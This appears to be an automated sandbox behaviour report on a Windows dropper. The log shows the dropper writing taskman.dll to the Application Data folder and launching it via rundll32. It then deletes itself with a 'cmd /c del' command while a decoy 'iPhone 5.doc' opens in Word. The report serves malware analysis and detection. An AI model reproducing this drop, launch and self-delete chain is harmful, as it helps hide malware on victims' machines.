Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:05 1 3 1
15:20:06 2 4 2
15:20:20 2 3 2
15:20:21 2 3 2
15:20:24 2 3 2
15:20:31 2 3 2
15:20:33 2 2 2
15:20:34 2 2 2
15:20:35 2 1 2
15:20:37 2 1 2
15:20:39 2 1 2
15:20:40 2 1 2
15:20:41 2 1 2
15:20:42 2 1 2
15:21:06 2 1 2

System Activites
System info class Completion Count Source Address Symbol

Timing Activites
Time Completion Count Source Address Symbol

Process Token Activites
Status Privilege Completion Count Source Address Symbol

Object Security Activites
Path Information Class Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time

Analysis File: ~WORDL.tmp PID: 1112 Parent PID: 1160

General
Start time: 15:20:20
Start date: 24/07/2012
Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp
Wow64 process (32bit): false
Commandline: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp
Imagebase: 0x400000
File size: 90112 bytes
MD5 hash: 99C47CE55EF67DAEE72E82608E4F62DD

File Activites
File Opened
File Path Access Options Content overwritten Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\taskman.dll read attributes and synchronize and generic read and generic write sequential only and synchronous io non alert and non directory file true success or wait 1 40155A CreateFileW
C:\WINDOWS\system32\rundll32.exe read attributes and synchronize and generic read sequential only and synchronous io non alert and non directory file true success or wait 1 4015AF CreateFileW
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\taskman.dll read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 1 401429 CreateFileW
File Written
File Path Offset Length Value Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\taskman.dll unknown 61440 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 401471 WriteFile
File Path Offset Length Value Completion Count Source Address Symbol
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 420000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 420000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 860000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 870000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 870000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 870000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 870000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 870000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 890000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 890000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 8A0000 262144 own pid read write success or wait 1
\KnownDlls\version.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit 8E0000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit 8E0000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit 8E0000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit 8E0000 180224 own pid readonly success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown 8E0000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit 8F0000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
C:\WINDOWS\system32\ole32.dll write and read and execute commit 940000 1290240 own pid execute success or wait 1
C:\WINDOWS\system32\ole32.dll query and write and read and execute image 774E0000 1302528 own pid read write success or wait 1
C:\WINDOWS\system32\rundll32.exe query and write and read and execute and extend size image 774E0000 1302528 own pid read write success or wait 1
C:\WINDOWS\system32\apphelp.dll write and read and execute commit 8F0000 126976 own pid execute success or wait 1
C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 940000 1208320 own pid readonly success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\rundll32.exe write and read and execute commit 8F0000 36864 own pid execute success or wait 1
C:\WINDOWS\system32\rundll32.exe query and read commit 8F0000 36864 own pid readonly success or wait 1
C:\WINDOWS\system32\rundll32.exe write and read and execute commit 8F0000 36864 own pid execute success or wait 1
C:\WINDOWS\system32\rundll32.exe query and read commit 8F0000 36864 own pid readonly success or wait 1
C:\WINDOWS\system32\rundll32.exe query and read commit 8F0000 36864 own pid readonly success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 940000 401408 own pid execute success or wait 1
\KnownDlls\netapi32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
\KnownDlls\SETUPAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
C:\WINDOWS\system32\urlmon.dll write and read and execute commit 940000 1212416 own pid execute success or wait 1
C:\WINDOWS\system32\urlmon.dll query and write and read and execute image 78130000 1257472 own pid read write success or wait 1
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
\BaseNamedObjects\Local\UrlZonesSM_Administrator query and write and read commit unknown unknown unknown unknown object name exists 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit 940000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 940000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit 940000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 940000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and write and read and execute and extend size image 940000 389120 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 940000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit A70000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit A70000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit A70000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit A70000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 940000 389120 own pid readonly success or wait 1

Registry Activites
Key Value Created
Key Path Name Type Data Completion Count Source Address Symbol
HKEY_USERS\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\system32\cmd.exe unicode Windows Command Processor success or wait 1 40178C ShellExecuteExW
Key Path Name Completion Count Source Address Symbol

Mutex Activites
Name Completion Count Source Address Symbol

Process Activites
Process Created
PID Filepath Cmdline Flags Completion Count Source Address Symbol
760 C:\WINDOWS\system32\rundll32.exe rundll32.exe C:\Documents and Settings\Administrator\Application Data\taskman.dll start none success or wait 1 40187C CreateProcessW
868 C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp > nul none success or wait 1 40178C ShellExecuteExW
PID Process info class Completion Count Source Address Symbol
Process Terminated
PID Filepath Completion Count Source Address Symbol
1112 C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp success or wait 1 4012C4 ExitProcess

Thread Activites
TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
TID PID Path Completion Count Source Address Symbol

Memory Activites
PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Protection Completion Count Source Address Symbol
Memory Protection Changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
1112 C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp 40140B 1000 page execute and read and write page execute read success or wait 2 4030AA VirtualProtect
1112 C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp 40140B 1000 page execute read page execute and read and write success or wait 2 40317B VirtualProtect
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:20 0 2 0
15:20:21 0 2 0
15:20:23 0 2 0
15:20:24 0 2 0
15:20:39 0 2 0
15:20:40 0 2 0
15:20:41 0 1 0

System Activites
System info class Completion Count Source Address Symbol

Timing Activites
Time Completion Count Source Address Symbol

Windows UI Activites
Window Created
Window name Class name HWND Completion Count Source Address Symbol
c0d0e0f0g1 c0d0e0f0g1 5013A success 1 4011A6 CreateWindowExA
HWND Completion Count Source Address Symbol
Window UIs Enumerated
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address Symbol
0 0 false 45C 5013A, 50104, 1, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 2 40178C ShellExecuteExW
HWND Completion Count Source Address Symbol
Window UI Shown
HWND Command Completion Count Source Address Symbol
5013A hide error 1 4011BA NtUserShowWindow
HWND Message LParam WParam Completion Count Source Address Symbol
TID Message LParam WParam Completion Count Source Address Symbol
Module Thread id Hook code Completion Count Source Address Symbol

Process Token Activites
Status Privilege Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Window created Window Name: c0d0e0f0g1 Class Name: c0d0e0f0g1 HWND: 5013A success 670993430
Window shown HWND: 5013A CMD: hide error 671089809
Memory attributes changed PID: 1112 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Base: 40140B Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 679596285
Memory attributes changed PID: 1112 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Base: 40140B Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 679604503
File created Path: C:\Documents and Settings\Administrator\Application Data\taskman.dll Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true success or wait 679604825
File write Path: C:\Documents and Settings\Administrator\Application Data\taskman.dll Offset: unknown Length: 61440 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 679710583
Memory attributes changed PID: 1112 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Base: 40140B Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 679727530
Memory attributes changed PID: 1112 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Base: 40140B Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 679727757
File opened Path: C:\Documents and Settings\Administrator\Application Data\taskman.dll Access: read attributes and synchronize and generic read and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: none Content Overwritten: true success or wait 679737347
File opened Path: C:\WINDOWS\system32\rundll32.exe Access: read attributes and synchronize and generic read Options: sequential only and synchronous io non alert and non directory file Attributes: none Content Overwritten: true success or wait 679738500
Process created PID: 760 Path: C:\WINDOWS\system32\rundll32.exe Cmdline: rundll32.exe C:\Documents and Settings\Administrator\Application Data\taskman.dll start Createflags: none success or wait 679978399
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Personal Type: unicode Data: C:\Documents and Settings\Administrator\My Documents Old data: success or wait 746075690
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0d6ab97b-ade6-11de-bdcc-806d6172696f} Name: BaseClass Type: unicode Data: Drive Old data: success or wait 746173455
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{811e0202-1746-11df-8a4d-806d6172696f} Name: BaseClass Type: unicode Data: Drive Old data: success or wait 746183808
Key value replaced with same Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Common Documents Type: unicode Data: C:\Documents and Settings\All Users\Documents Old data: success or wait 746227227
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Desktop Type: unicode Data: C:\Documents and Settings\Administrator\Desktop Old data: success or wait 746249557
Key value replaced with same Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Common Desktop Type: unicode Data: C:\Documents and Settings\All Users\Desktop Old data: success or wait 746258159
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: ProxyBypass Type: dword Data: 1 Old data: success or wait 746612670
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: IntranetName Type: dword Data: 1 Old data: success or wait 746612964
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: UNCAsIntranet Type: dword Data: 1 Old data: success or wait 746613255
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: AutoDetect Type: dword Data: 1 Old data: success or wait 746613543
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: ProxyBypass Type: dword Data: 1 Old data: success or wait 746623098
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: IntranetName Type: dword Data: 1 Old data: success or wait 746623388
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: UNCAsIntranet Type: dword Data: 1 Old data: success or wait 746623678
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: AutoDetect Type: dword Data: 1 Old data: success or wait 746623964
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Cache Type: unicode Data: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files Old data: success or wait 746634597
Key value replaced with same Path: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Cookies Type: unicode Data: C:\Documents and Settings\Administrator\Cookies Old data: success or wait 746637426
Key value set Path: HKEY_USERS\Software\Microsoft\Windows\ShellNoRoam\MUICache Name: C:\WINDOWS\system32\cmd.exe Type: unicode Data: Windows Command Processor Old data: success or wait 746679638
Process created PID: 868 Path: C:\WINDOWS\system32\cmd.exe Cmdline: C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp > nul Createflags: none success or wait 746744342
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 45C HWNDs: 5013A, 50104, 1, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 747128616
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 45C HWNDs: 5013A, 50104, 1, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 747129043
Process terminated PID: 1112 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp success or wait 747170804

Analysis File: cmd.exe PID: 1096 Parent PID: 1160

General
Start time: 15:20:20
Start date: 24/07/2012
Path: C:\WINDOWS\system32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c iPhone 5.doc
Imagebase: 0x4ad00000
File size: 389120 bytes
MD5 hash: 6D778E0F95447E6546553EEEA709D03C

File Activites
File Path Access Options Content overwritten Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 340000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 480000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 480000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 490000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 970000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 970000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 440000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 440000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 440000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 970000 618496 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc query and write and read and execute and extend size image unknown unknown unknown unknown invalid image not mz 1
\BaseNamedObjects\ShimSharedMemory write unknown 980000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\apphelp.dll write and read and execute commit 990000 126976 own pid execute success or wait 1
C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 990000 1208320 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc query and read commit 990000 24576 own pid readonly success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 9A0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 9A0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 9B0000 262144 own pid read write success or wait 1
\KnownDlls\netapi32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
\KnownDlls\SETUPAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\msi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE query and write and read and execute and extend size image 7D1E0000 2867200 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE query and read commit 9F0000 12312576 own pid readonly success or wait 1

Registry Activites
Key Value Modified
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040110900063D11C8EF10054038389C\Usage WORDFiles dword 1089994759 1089994760 success or wait 1 4AD13114 ShellExecuteExW
Key Value Queried
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DisableUNCCheck object name not found 1 4AD04A2A RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor EnableExtensions success or wait 1 4AD04A4F RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DelayedExpansion object name not found 1 4AD04A88 RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DefaultColor success or wait 1 4AD04AAD RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor CompletionChar success or wait 1 4AD04AE5 RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor PathCompletionChar success or wait 1 4AD04B37 RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor AutoRun success or wait 1 4AD04BB8 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor DisableUNCCheck object name not found 1 4AD04A2A RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor EnableExtensions success or wait 1 4AD04A4F RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor DelayedExpansion object name not found 1 4AD04A88 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor DefaultColor success or wait 1 4AD04AAD RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor CompletionChar success or wait 1 4AD04AE5 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor PathCompletionChar object name not found 1 4AD04B37 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor AutoRun object name not found 1 4AD04BB8 RegQueryValueExW

Mutex Activites
Name Completion Count Source Address Symbol

Process Activites
Process Created
PID Filepath Cmdline Flags Completion Count Source Address Symbol
900 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE /n /dde none success or wait 1 4AD13114 ShellExecuteExW
PID Process info class Completion Count Source Address Symbol

Thread Activites
TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
TID PID Path Completion Count Source Address Symbol

Memory Activites
PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Value Completion Count Source Address Symbol
Memory Allocated
PID Filepath Base Length Protection Completion Count Source Address Symbol
1096 C:\WINDOWS\system32\cmd.exe 970000 13FE10 page read and write success or wait 1 4AD04578 VirtualAlloc
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:21 1 3 1
15:20:23 1 3 1
15:20:24 2 4 2
15:20:42 2 4 2
15:20:43 2 4 2
15:20:44 2 4 2

System Activites
System info class Completion Count Source Address Symbol

Timing Activites
Time Completion Count Source Address Symbol

Windows UI Activites
Window name Class name HWND Completion Count Source Address Symbol
HWND Completion Count Source Address Symbol
Window UIs Enumerated
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address Symbol
0 0 false 1A8 A014E, 1, 530049, 520054, 5C0059, 530055, 520045, 53005C, 31002D, 35002D, 32002D, 2D0031, 300035, 390037, 310032 success or wait 2 4AD13114 ShellExecuteExW
